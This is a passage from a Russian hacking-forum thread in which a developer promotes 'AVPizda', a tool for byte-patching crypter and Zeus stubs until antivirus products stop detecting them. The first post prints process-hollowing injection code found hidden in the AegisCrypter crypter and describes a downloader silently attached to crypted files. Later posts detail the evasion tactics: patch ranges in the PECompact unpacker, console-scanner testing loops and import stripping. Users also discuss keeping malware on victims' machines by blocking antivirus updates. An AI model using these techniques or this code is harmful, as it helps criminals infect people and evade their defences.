500$ за, то чтобы кто-то сделал справку для AVPizda, от желающих будешь отмахиваться лопатой. Решил, значит AegisCrypter посмотреть на предмет возможности включить обход UAC и даже была, мысля написать статью про этот обход (если там будет что-то интересное). Скачал новую версию криптора, закриптовал файлег и че-т при старте система орать стала что ошибка и у меня нет доступа в сеть. Думаю, че за нах, клон диска системы на VM чист, только что из упаковки, короче не предал этому значения и полез делать реверс закриптованного файла. И тут че-т, когда просматривал код места, где возможен обход UAC... мысля, пробила, глянуть, а чего там за данные идут после закриптованного файла, а там оказались данные опций, которые как раз включают этот самый обход UAC, но ниже шел еще один маленький приклеенный засранчег... Короче на месте обхода UAC находился какой-то говно-код типа такого: Код:
if(pidh->e_magic != IMAGE_DOS_SIGNATURE)
{
return;
}
pinh = (PIMAGE_NT_HEADERS)&lpBuffer[pidh->e_lfanew];
if(pinh->Signature != IMAGE_NT_SIGNATURE)
{
return;
}
CreateProcess(NULL, szProcessName, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
NtUnmapViewOfSection(pi.hProcess, (PVOID)pinh->OptionalHeader.ImageBase);
VirtualAllocEx(pi.hProcess, (LPVOID)pinh->OptionalHeader.ImageBase, pinh->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, (LPVOID)pinh->OptionalHeader.ImageBase, &lpBuffer[0], pinh->OptionalHeader.SizeOfHeaders, NULL);
for(INT i = 0; i < pinh->FileHeader.NumberOfSections; i++)
{
pish = (PIMAGE_SECTION_HEADER)&lpBuffer[pidh->e_lfanew + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER) * i];
WriteProcessMemory(pi.hProcess, (LPVOID)(pinh->OptionalHeader.ImageBase + pish->VirtualAddress), &lpBuffer[pish->PointerToRawData], pish->SizeOfRawData, NULL);
}
GetThreadContext(pi.hThread, &ctx);
ctx.Eax = pinh->OptionalHeader.ImageBase + pinh->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(pi.hThread, &ctx);
ResumeThread(pi.hThread);
Если вдруг кто-то покупал этот криптор и реально работает обход UAC, то скиньте в личку купленный криптор, я посмотрю и возможно напишу статью об обходе UAC. Ну и теперь эффект разорвавшейся бомбочки. Оказалось, что к закриптованному файлу клеится качек. В принципе ничего интересного, если бы не сама пикантность ситуации. Качек оказался тривиальный URLDownloadToFile [Ссылки могут видеть только зарегистрированные пользователи.] %TEMP%\m_editerror.tmp CreateProcess Ну, естественно я решил посмотреть че за файл пытается скачацца, но сука как назло сайтег канул в лету. Оставалось надежда на гугл, но и тут ничего кроме отчетов от AV, посмотрев на которые становится понятно, что много криптуемых файлов было заражено этим говном. Поведенческий анализ показывает, что заражены были файлы, начиная от ратов и заканчивая зевсами. Всегда было непонятно зачем бесплатно распространять такой криптор с обновлениями, а сейчас еще больше непонятно зачем качек с мертвым линком. Стало интересно, а с какой версии появилась эта байда и как оказалась ноги растут, начиная с версии 2.5 (более ранние не смотрел.) Так что неизвестно что там скачивалось и сказать, как почистить я не могу, но вполне возможно, что те, кто запускал криптованные файлы на реальном компе уже давно является частью ботнета! Выкладывать качек не вижу смысла - там все примитивно и просто да и потому как любой может его вытащить сам из закриптованного файла, надо просто проследить до того места когда расшифруется в памяти оригинальный файл и немного ниже будет этот качек. |
|||||
|
|
|
|
24-01-2014
|
#15 |
|
Re: AVPizda
перезалейте 0.4.05 который работает без пакера
|
|
|
|
|
06-02-2014
|
#16 |
|
Re: AVPizda
Фиксы:
Исправлено неюзабельное Always On Top (когда окно Patcher перекрывало окно выбора лог-файла и многое другое...), и улучшено по функциональности. И еще че-то там исправлено, уже не помню что именно... Добавлено: Новый функционал-режим AVTest. Что это такое и с чем это едят: Продолжая традицию софта, я на юнубе нашел несколько видео от буржуйских чистильщиков... Так вот там смысл чисток (если их можно так назвать) был в том, что нужно было в HEX-редакторе менять (грубо говоря нопить) в закриптованном файле по 200 байт и проверять антивирусом от которого пытаемся чиститься и так повторять до конца файла или пока не заткнется AV. (у меня создалось такое впечатление, что некоторые там не знают что такое AVfucker) Как чистится, там не показано (да это и неважно), главное показано было, как найти то место, на которое орет AV. (хотя они все снимают по сути одно и то же, только говноники с рабочим столом меняются) Я когда делал реверс многих антивирусов, натыкался на проверочный код, который по своей сути проверял подряд идущие одинаковые байты (к примеру, нули на OEP (чего просто не может быть в рабочем *.exe)) и специально показывал, что файл чист. Я сам так попадал несколько раз, из-за этого приходилось в пустую несколько раз делать реверс, но зато, понасмотревшись на подобного рода "ловушки", я выработал стратегию их обхода. Так вот такая стратегия (примитивно-частично, не учитывая проверок энтропии и подобного.) реализована в функционале AVTest. Юзать очень просто - выбираем закриптованный файл и жмем кнопку AVTest. (могу многих обрадовать, у режима AVTest нет так всеми ненавистной привязки к PECompact'у, но ограничение все же есть - режим AVTest работает только с секцией кода, что позволяет определить идет ли детек по коду.) В результате рядом с закриптованным файлом будет создана папка AVTest, в которой будут две папки online и offline. В online-папке будут лежать файлы, которые нужно проверить на каком-нибудь онлайн-авчекере, проверяете оригинал и файлы из этой папки и сравниваете, увидев, где исчез антивирус, от которого делается чистка или исчезла группа антивирусов, стало быть, это и есть тот диапазон, который нужно чистить. (вообще online нужен, если делается чистка от многих антивирусов сразу) Переходите в папку offline, выбираете файлы из диапазона и проверяете их AV установленным локально (предварительно обновив базы). Те диапазоны адресов, на которых замолчит AV и есть места, где нужно чистить. (диапазон 256 байт.) Диапазоны адресов (в названиях файлов) указаны в шестнадцатеричной системе счисления, во как. По сути то, что обычно показывают на видео в течение 10 и более минут, AVTest позволяет сделать нажатием всего одной кнопки. То, что данный функционал будет полезен тем, у кого свой крипт-сервис думаю и так понятно, но вот чем полезен, может быть для рядового юзера? Наверное, многим известна проблема с облачными технологиями антивирусных компаний, но пиздец крадется, как говорится незаметно... Давайте посмотрим на это еще с одной стороны: /showthread.php?t=16914 + думаю всем известно кто владелец virustotal.com , и соответственно сложив все это вместе можно заранее понять, что нас будет ждать теоретически в будущем. Есть ли кто-то, кто предложит тему, как воевать с подобными явлениями? Коммерция: Существует возможность доступа к приватному-тестовому режиму (нет гарантий, что все получится (все зависит от крипта), но существует система проверки, при которой заказчик будет все проверять и на основе реальных результатов профита принимать решение...). Все подробности и первый контакт в ПМ. Поле баннера позволяет разместить рекламу. Вроде в хак-софте еще никто не юзал такую тему. (будет влиять на частоту обновлений проги.) Кнопка Donate - хз. может, кто-нибудь изъявит желание. Единственное, что следует отметить, так это то, что баланс будет влиять на частоту обновлений проги. Скачать: [Ссылки могут видеть только зарегистрированные пользователи.] |
|
|
|
|
22-02-2014
|
#17 |
|
Re: AVPizda
Мне вот интересно, а если мне надо что бы зловред продержался на ПК жертвы год или больше ... мне что надо через каждую неделю перекриптовывать и закидывать жертве заново а старого удалять с ПК ???????
|
|
|
|
|
22-02-2014
|
#18 |
|
Re: AVPizda
Slavik 25, не дай обновиться антивирусу.
|
|
|
|
|
25-02-2014
|
#19 |
|
Re: AVPizda
Полезно, спасибо за АВпизду, кину тебе чуточку доната за сторание
|
|
|
|
|
10-03-2014
|
#20 |
|
Re: AVPizda
чето у меня никак до пизды руки не доходят. надо будет посмотреть потом, что это из себя представляет.. много текста, много версий. за старания +
|
|
|
|
|
05-05-2014
|
#21 | |
|
Re: AVPizda
Добавил возможность "чистить" стабы от AegisCrypter версий 5.0 и 5.1 упакованными PECompact'ом, которые можно было ранее выложенные скачать...
Было пофикшено несколько мелких багов. Продолжая традицию софта, мне попались несколько видео, в которых один чел при чистках стабов использовал проги специально заточенные под аверские консольные сканнеры, на мой взгляд, у него удачно все получалось и самое главное очень быстро и удобно. Но для каждого консольного сканнера - это не очень удобно, я решил добавить в авпиздецок новый режим AVScan. В настройках появилась новая возможность, где можно просто указать путь к консольному сканеру. Пока добавлен один AV - Avira, но в дальнейшем планирую расширить как возможности настроек так количество AV. Такие уже попытки были сделаны по созданию такого софта, и даже был релиз исходников HH MultiScan 2.4, но софт/проект умер, так как имел слабую актуальность, по отзывам (практически нулевую) при количестве скачиваний 1k. Обычно существует прямая зависимость между поддержкой кодером софта и количеством юзающих этот софт. Когда автор софта видит что его софт юзают всего несколько человек, он естественно учитывает тот напряг, который происходит при каждом релизе и соответственно, в результате чего делает вывод, что софт никому не нужен, а из-за пары человек напрягаться не имеет смысла... Собственно это и есть одна из основных причин умирания проектов, которые так и не смогли в народе получить популярность юзанья. Хотелось бы немного рассказать о режиме AVScan, для чего он нужен и как им "пользоваться". Обычно каждый крипт имеет свои особенности, на основе которых делается детект, но также существует определенное количество антивирусов, которые палят один крипт, а другие антивирусы его в упор не замечают. Исходя из этого правила не нужно чекать крипт на палевость всеми существующими антивирусами, а достаточно всего 10-15 вендеров для того, чтобы добиваться FUD'а. Каждый из вендеров имеет как свои преимущества, так и недостатки перед другими вендорами, у кого-то сильный движок по проверке энтропии (Bitdefender), у кого-то по проверке PE-формата (Avira) и т. д... К примеру, после того как заюзав режим AVTest, можно будет воспользоваться режимом AVScan, чтобы быстро проверить локально на палевность крипт, а уже после этого online-сканнером. Я не вижу смысла описывать о преимуществах данного режима, потому что придерживаюсь, правила: если человеку дал бог ума - значит, он сможет воспользоваться этой возможностью, ну а если нет - то есть видео и дрочево... Ну и теперь о самом важном: Почему именно консольные сканнеры - все очень просто, потому что в online-сервисах (VT) юзаются именно консольные сканнеры, а также это позволяет установить на одну виртуальную машину сразу 10-15 антивирусов, которые не будут конфликтовать между друг другом. О настройках AV Scanners: (Avira) Цитата:
Скачать: [Ссылки могут видеть только зарегистрированные пользователи.] |
||
|
|
|
|
05-05-2014
|
#22 |
|
Re: AVPizda
интересует вопрос, хоть одтн криптор или зверёк почишен этой программой? просто например я уже раза 3 сменил алгоритм чистки( вернее не я а аверы затыкают дыры и приходится искать другие места для замены) , щас даже последовательность чистки аверов влияет очень на результат, хотелось бы увидеть видео чистки, а то у тебя уже комерческие версии в ход пошли, а неодного криптора почищенного твоей программой я не видел, это не в укор просто хочу понять , что можно выжать из твоей проги
для примера возьми любой стаб криптора зевс с форума и покажи, что сможет сделать твоя программа Последний раз редактировалось SQIFF; 05-05-2014 в 19:39. |
|
|
|
|
10-05-2014
|
#23 | ||
|
Re: AVPizda
Цитата:
Цитата:
Тема создавалась для слива инфы в паблик и чтобы советы давали, как улучшить платформу для чистки стабов. Видео снимать сейчас бесполезно, так как прога имеет статус бэтки, а это значит, что какой-то функционал в процессе может исчезнуть/измениться и вообще все может поменяться еще 100500 раз. Если ты хочешь чтобы платформа улучшила свои возможности, так возьми свои стабов 10-20, которые ранее чистил, но потом они стали палиться, пожми их раром и залей куда-нибудь, а ссылку кинь мне в личку - это будет реально полезным действием с твоей стороны. Я потом когда буду пилить прогу, возьму, посмотрю на те изменения, которые ты сделал при чистках и вполне возможно, что расширю диапазон, где можно будет патчить... Софт делается для того чтобы ускорить процесс так называемых чисток, но не как не гарантирует FUD, по сути FUD'а невозможно добиться без определенных знаний, дополнительного софта, "стратегии" и много чего еще... Обычно видео снимают, чтобы показать, как убить один антивирус, а с помощью этого софта можно убить гораздо больше чем один антивирус... |
|||
|
|
|
05-05-2014
|
#24 |
|
Re: AVPizda
Перезалил 4 файла из поста выше: [Ссылки могут видеть только зарегистрированные пользователи.]
|
|
|
|
|
|
16-05-2014
|
#25 | ||
|
Re: AVPizda
Вообщем взял я для примера почищенный недавно стаб зевса и решил сравнить, что же там за такое изменилось что перестало "чиститься" пизденочкой...
Первое что заметил, что раньше стаб патчился значением 90, а сейчас значением DD. Патч осуществляется размером в один байт. Для FUD'а требуется всего около 5-8 патчей. Пизденочка патчит всегда рандомными значениями от 01 до FF (то есть отпадает выбор решения, каким же значением патчить...). Вполне возможно, что размер патчинга в 1 байт более предпочтительнее, чтобы добиться FUD'а, но пизденочка позволяет делать патчи размером от 1 до 4 байт - это сделано, чтобы платформа имела значительно больше возможностей для так называемой чистки. 5-8 патчей платформа может сделать за считанные секунды, а вручную этот процесс может занять несколько часов или даже более и это ручное дрочево в равной степени доли вероятности не гарантирует, что будет FUD... Тут может кому-то переть "чистить" стабы пизденочкой, а кому-то вручную - короче, кто как может - тот так и дрочит... Каким методом и софтом "чистить" - каждый выбирает для себя сам и тут никто никого насильно не заставляет юзать авпизденочку и тем более платить за нее деньги... Второе что заметил, так это то, что изменена иконка и версия файла - ну тут как бы все логично и является обязательным телодвижением, но при этом изменять версию файла и иконку нужно еще до чистки (именно до), и также иконка и версия файла должны быть уникальными, особенно иконка. Хотелось бы отметить тот факт, что не нужно использовать стандартные иконки из системы - это может с большей доли вероятности повлиять на детект файла именно по иконке... Третье, так чисто интуитивно думаю, что вполне возможно, что влиять на FUD может также уровень сжатия PECompact'ом. Четвертое: Цитата:
Ну, теперь о том, в каких областях происходит патчинг, чтобы сбить детект. Хотелось бы, забегая вперед сообщить, что в этом плане ничего не изменилось, но я все же доработал несколько мелких нюансов, что вполне возможно еще более улучшит возможности, так называемой чистки... Самое удивительное что с того момента и до сего дня ведь ничего не изменилось, походу аверы штампуют тупо сигны и пиздец... )))))) Я вот скачал несколько стабов имеющих статус FUD и посмотрел диапазон адресов, по которым сделан патчинг и все они попадали в тот диапазон, который я выставил в AVPizda. (я даже диапазон выставил с небольшим запасом, чтобы уже точно ничего не пропустить) И вот ниже я хочу на картинках показать, в каких диапазонах происходит патчинг и показать (для сравнения) сделанные патчи пизденочкой. Кстати пока писал все это, понял, что все же у проги уже появилась своя история и надо дополнить инфу в About... Почищенный недавно стаб зевса будет выступать в качестве сравнения, чтобы ни у кого не возникало сомнений, что почистить более чем реально - тут главное найти нужный подход... (IMHO) На скрине я выделил красной рамкой место, где был сделан патч в стабе зевса значением DD, этот патч (KillAvira) был также и в AVPizda, но я его убрал, потому что подумал, что он уже нерабочий, но вот как оказалось зря. В связи с этим я решил вернуть тактику специальных патчей и теперь в результатах патчера (напротив этих специальных патчей) будет появляться пометка SpecPatch #1 Такие патчи вполне возможно будут убивать какие-то антивирусы, но в любом случае их можно будет просто отключить, если они не нужны... На этом скрине также я выделил красной рамкой место, где был сделан патч в стабе зевса значением DD, но тут я хочу показать диапазон, где нужно патчить чтобы сбить детекты антивирусами, к примеру, синие рамки показывают места где были патчи сделаны в других стабах и их значения. AVPizda также патчит эту область, такие патчи видны сразу в патчере, у них адреса в самом начале файла... Ну и теперь базовая часть, где патчится сам код распаковщика PECompact'а. На этом скрине показаны для сравнения два стаба - с левой стороны стаб зевса FUD, а справой этот же стаб, только обработанный пизденочкой. Серым цветом выделена область кода распаковщика PECompact'а. С левой стороны выделенные красными рамками патчи значением DD - их всего три, а вот синие рамки указывают на возможные дополнительные патчи и при этом я так думаю, что патч со значением FE был основным, который и сделал стаб FUD'ом. Притом здесь самое интересное то, что вот этот диапазон кода от синего патча до синего патча, является важным для "чистки" и на который особенно реагируют аверы. (IMHO) Зеленым цветом выделена сигнатура, по которой и ищется эта область кода для патчинга. Стоит пояснить, что также этот диапазон кода, выделенный зеленым, является важным для "чистки" и на который особенно реагируют аверы. (IMHO) С правой стороны красным выделены патчи, которые сделала AVPizda. На скрине видно, что и там и там патчинг делается в нужных областях, тут всего лишь зависит от доли везения, чтобы добиться FUD'а. Теперь о новых возможностях пизденочки. В связи свыше изложенным текстом я добавил в Quick Options дополнительное поле для настройки, которое позволяет выставить количество повторов попыток. А это значит, что предпочтительнее будет выставить 100 попыток и 10 повторов, чем 1000 попыток. И также включена в настройках опция AutoScan в разделе AV Scanners Options. И еще добавлен один антивирус Kaspersky, и теперь можно в дереве опций включать и выключать антивирусы при сканировании в режиме AVScan. Настройки для Kaspersky: Цитата:
Грубо говоря, ставим попыток 200 и повторений 50, включаем AutoScan и идем обедать, после еды приходим и проверяем.., что останется в папках - то, стало быть, и есть "улов". По-сути можно так круглыми сутками крутить и к вечеру проверять папки с оставшимися патчами и уже за минимальное время получать "чистый" стаб... Ну и теперь о самом главном. Я расширил возможности режима AVTest, теперь дополнительно в папке AVTest будет появляться папка import. В этой папке будут появляться файлы, в которых будет затерт импорт (по одной API), а в логе напротив файла будет появляться что-то типа такого: (Cleared: GetPrivateProfileStringA) Эту папку можно будет проверять антивирусами, и узнавать на какую API орет AV и вообще сразу будет понятно виноват ли в детекте импорт. Недавно я решил уменьшить в своем крипторе стаб, ну и там навести немного марафет и бля неожиданно стал орать NOD32, чес-слово я был в шоке, никогда эта блядина мой крипт не детектила, а тут... причем так основательно с наскока и нескольких попыток у меня не получилось избавиться от этого детекта. И вспомнил я тут одну тему на васме [Ссылки могут видеть только зарегистрированные пользователи.] У меня был вот такой детект: Win32/Injector.AJZF Из 20 закриптованных файлов 1 только получался чистым. Пришлось делать реверс этого убого AV, как говорится долго он не смог сопротивляться и был "порван". И я вот к чему это, так вот сука эта орала на присутствие в импорте одной API - GetProcessHeap При этом обидно, что эту GetProcessHeap я в коде-то и не юзал, она так была, для фэйка в импорте и подумать даже не мог, что эта API может стать причиной детекта... Вот потратил время на такой пустяк (хотя теперь знаю, по какому принципу NOD32 детектит - примитивный эвристик (так как и написал на васме egyp7 и еще коммент sn0w про импорт - тоже в тему))... теперь вот с помощью этой возможности AVTest, у всех AV можно узнать, виноват ли в детекте импорт. Импорт естественно должен быть правильным в плане PE-формата (AVPizda валидность не проверяет). Скачать: [Ссылки могут видеть только зарегистрированные пользователи.] |
|||
|
|
|
|
16-05-2014
|
#26 |
|
Re: AVPizda
Интересно, подход смахивает на инновационный, но малоэффективно. Имеет право на существование как теоретическое изыскание. Multik, молодец. Радует то, что хоть кто-то старается орудовать мозгом и генерировать что-то новое, хоть это ново только отчасти.
Последний раз редактировалось hdsckr; 16-05-2014 в 21:32. |
|
|
|
|
1 неделю назад
|
#27 | |
|
Re: AVPizda
Проапгрейдил режим AVTest: Теперь будет появляться в папке AVTest новая папка DSplit, в которой будут обрезанные сэмплы - по сути это можно сделать при помощи любой софтины у которой есть DSplit, но там надо совершить массу телодвижений, а пизда позволяет это сделать нажатием всего одной кнопки, при этом, если файл имеет малый размер - пилицца файл будет на 0x400, а если нормальный или большой, то на 0x1000. Еще будет в папке AVTest создаваться автоматом лог-файл (AVTest.log), в котором будет сохраняться вся инфа из Log окна. Также улучшил online - теперь будут создаваться дополнительные файлы, в которых будет заполняться полностью вся секция кода (вернее первая секция) рандомными данными, а также еще парочка, в которых будет заполняться только половина секции (верхняя и нижняя части) - это полезно при закриптованных файлах, которые имеют маленький размер файла. Стала доступна новая опция Display Results After Scanning в AV Scanners Options, после того как файл будет просканирован антивирусом в окно Log будет добавлен результат скана. Результаты скана будут находиться в папке Reports. Также если эта опция включена в сканируемую папку будет добавлен AVScan.log Скорее всего, про что-то забыл написать (наверное, что-то в функционале AVScan допиливал), так как кодил давно и вот только сейчас нашел время сделать релиз... А еще, по-моему, увеличил количество патчей в начале файла, там было 10%, а сделал 30%... хотя думаю в будущем вообще всю систему переделать и сделать рандомный патчинг в директориях... тема реально good и в тоже время лольная - аверы ахуеют)))) Добавил окно AV Scanners, которое будет появляться или исчезать при нажатии на узкую кнопку с левой стороны. В этом окне можно быстро включать нужные или выключать ненужные антивирусы, которые будут запускаться в том порядке, в котором расположены в этом окне, порядок можно менять при помощи Drag&Drop, на скрине я постарался показать, как этот процесс выглядит. Будут появляться и станут доступны антивирусы в AV Scanners только тогда, когда будет указан путь к антивирусным сканерам в настройках. Также добавлен новый антивирус Bitdefender, он является вендером для Код:
Emsisoft F-Secure GData MicroWorld-eScan ArcaVir и т. д. Настройки для Bitdefender: Цитата:
[Ссылки могут видеть только зарегистрированные пользователи.] |
||
|
|
|
|
1 день назад
|
#28 |
|
Re: AVPizda
Ребят,может кто запилить тутор по данной пизде,а то я уже перечитал все эти посты несколько раз и досих пор не вник,в глазах уже рябит,ничего не соображаю)Сори за флуд,просто если кто-то захочет,то спасибо)
Последний раз редактировалось xLoLnoobWMZx; 1 день назад в 23:30. |
|
|
|
|
1 день назад
|
#29 |
|
Re: AVPizda
Multik в шапке твоей проги написано СДЕЛАНО В РОССИИ , а почему все названия на пиндоском? раз делаеш для россиян то и названия кнопок и т.д. пиши по РУССКИ (тебе это поправить пара минут а люди страдают) или тогда пиши СДЕЛАНО для ПИНДОСИИ
это моё личное мнение и никому его не навязываю |
|
|
|
|
| Для того, чтобы ответить в теме, необходимо зарегистрироваться. |
| Метки |
| avpizda, nodistribute, patch, radikal, result, size, trojan, windows, будет, даже, если, защиту, кода, много, можно, надо, нужно, после, потом, программой, просто, сделать, твоей, файл, чистки |
| Здесь присутствуют: 1 (пользователей: 0 , гостей: 1) | |
| Опции темы | |
| Опции просмотра | |
Комбинированный вид
|
|
Часовой пояс GMT +3, время: 18:17.